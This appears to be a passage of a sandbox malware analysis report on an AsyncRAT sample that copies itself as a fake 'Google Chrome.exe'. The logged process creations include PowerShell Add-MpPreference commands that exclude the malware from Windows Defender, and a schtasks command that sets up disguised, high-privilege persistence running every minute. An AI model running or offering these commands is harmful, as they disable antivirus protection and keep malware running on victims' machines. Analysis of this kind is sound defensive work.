            Source: C:\Users\user\AppData\Local\Google Chrome.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: ra66DSpa.exe, SMSgUiSVv3VmiBEwi2DMT63wt7smZiXjq0LioRiB1et93rMTrPHdUXWiqvmZhjDIhf9bNc6DkVqdsNh.csCryptographic APIs: 'TransformFinalBlock'
            Source: ra66DSpa.exe, cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.csCryptographic APIs: 'TransformFinalBlock'
            Source: ra66DSpa.exe, cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.csCryptographic APIs: 'TransformFinalBlock'
            Source: Google Chrome.exe.0.dr, SMSgUiSVv3VmiBEwi2DMT63wt7smZiXjq0LioRiB1et93rMTrPHdUXWiqvmZhjDIhf9bNc6DkVqdsNh.csCryptographic APIs: 'TransformFinalBlock'
            Source: Google Chrome.exe.0.dr, cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.csCryptographic APIs: 'TransformFinalBlock'
            Source: Google Chrome.exe.0.dr, cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.csCryptographic APIs: 'TransformFinalBlock'
            Source: ra66DSpa.exe, JE3MyWDhSci5SqRxDY2LszRRtRrMFG5pnuiN9BawburQvvE3IgB9xUM6OYalXv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: ra66DSpa.exe, JE3MyWDhSci5SqRxDY2LszRRtRrMFG5pnuiN9BawburQvvE3IgB9xUM6OYalXv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Google Chrome.exe.0.dr, JE3MyWDhSci5SqRxDY2LszRRtRrMFG5pnuiN9BawburQvvE3IgB9xUM6OYalXv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Google Chrome.exe.0.dr, JE3MyWDhSci5SqRxDY2LszRRtRrMFG5pnuiN9BawburQvvE3IgB9xUM6OYalXv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@20/20@2/2
            Source: C:\Users\user\Desktop\ra66DSpa.exeFile created: C:\Users\user\AppData\Local\Google Chrome.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Google Chrome.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
            Source: C:\Users\user\Desktop\ra66DSpa.exeMutant created: \Sessions\1\BaseNamedObjects\qzRueo4pn2rjItZU
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2864:120:WilError_03
            Source: C:\Users\user\Desktop\ra66DSpa.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
            Source: ra66DSpa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ra66DSpa.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\ra66DSpa.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: ra66DSpa.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\ra66DSpa.exeFile read: C:\Users\user\Desktop\ra66DSpa.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\ra66DSpa.exe "C:\Users\user\Desktop\ra66DSpa.exe"
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ra66DSpa.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Local\Google Chrome.exe "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Google Chrome.exe "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Google Chrome.exe "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Google Chrome.exe "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'Jump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ra66DSpa.exe'Jump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe'Jump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'Jump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: version.dll
